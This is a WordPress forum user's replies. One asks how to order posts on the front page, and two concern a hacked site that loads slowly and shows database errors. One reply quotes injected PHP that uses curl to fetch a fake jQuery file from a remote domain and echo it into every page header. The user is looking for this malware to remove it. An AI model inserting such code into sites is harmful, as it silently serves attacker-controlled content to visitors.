hereiamlive
Forum Replies Created
-
I feel your pain Forexsq,
I would like to do the same thing
I want to have 3 posts on the first page (the homepage if you will) of the blog. The rest of the blog should have at least 5 posts per page.
And the 3 posts I put on the main page will come from different categories and it is a must that I can put them in order.Here is then silly way I have done this myself since, like you, I cannot find the answer anywhere.
After trying every stick plugin I went right back to WP_Sticky
And make the three post I wanted on the front page Announcements in reverse order which made the last Announcement the first post on the page.
I set in the Setting Tools under reading 3 post which sucks because now very category is limited to 3 posts.
Then end result is that I have my 3 posts in the right order on my front page.
Wish someone could give us a better system
Thanks in advance for your efforts in coming up with something for us.
CoreyForum: Fixing WordPress
In reply to: Error Message: Couldn't connect to database server.I searched the header.php file from my ‘wp-content/themes/twentyten/header.php’ directory and did not find that code:
<?php
if(function_exists(‘curl_init’))
{
$url = “https://www.4llw4d.freefilesblog.com/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>I am still getting the error:
Couldn’t connect to database server.Couldn’t find database magical_rules.An unexpected problem has occured with the application.
SELECT statscurl_id FROMstatscurl
WHERE statscurl_ip = ”;What am I missing?
Forum: Fixing WordPress
In reply to: Help with backlinker.php / 404 ErrorI hate to be the only idiot out there, but I checked my header.php file in both the themes I have downloaded and I cannot find that code at all. The problem is my site now takes forever to load and says waiting on freefilesblog.com so I know it is there somewhere just cannot find the code
My header file is pretty short about a page and a half or less. I am pretty sure I am not just missing it
Any ideas?